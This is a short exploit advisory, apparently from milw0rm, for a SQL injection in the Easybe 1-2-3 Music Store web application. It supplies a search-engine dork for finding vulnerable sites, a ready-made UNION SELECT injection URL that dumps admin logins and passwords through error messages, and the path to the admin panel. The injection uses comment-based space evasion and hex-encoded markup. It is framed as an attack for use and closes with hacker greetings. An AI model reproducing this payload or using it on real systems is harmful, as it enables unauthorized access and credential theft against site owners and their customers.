30 lines
No EOL
1.3 KiB
Text
30 lines
No EOL
1.3 KiB
Text
--==+================================================================================+==--
|
|
--==+ Easybe 1-2-3 Music Store SQL Injection Vulnerability +==--
|
|
--==+================================================================================+==--
|
|
|
|
|
|
|
|
AUTHOR: t0pP8uZz & xprog
|
|
SITE: http://www.easybe.com/
|
|
DORK: intext:"Powered by the 1-2-3 music store"
|
|
|
|
DESCRIPTION: SQL injection in CatagoryID of process.php, able to retrieve admin/pass through
|
|
error message.
|
|
|
|
EXPLOIT:
|
|
http://www.site.com/123music-path/process.php?pname=ShowAlbumProcess-Start&CategoryID=1/**/and/**/1=2/**/UNION/**/ALL/**/SELECT/**/concat(0x31203C666F6E7420636F6C6F723D7265643E,login,0x3a,passwd,0x3C2F666F6E743E)/**/from/**/user/*
|
|
|
|
NOTE:
|
|
The CatagoryID value gets passed to a couple SELECT statements and we couldn't get
|
|
the results to display inline so we made the data you want to see red in the error msg.
|
|
|
|
Admin login is in /process.php?pname=ShowPageProcess-Start&page=admin/index
|
|
|
|
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !
|
|
|
|
|
|
--==+================================================================================+==--
|
|
--==+ Easybe 1-2-3 Music Store SQL Injection Vulnerability +==--
|
|
--==+================================================================================+==--
|
|
|
|
# milw0rm.com [2007-07-01] |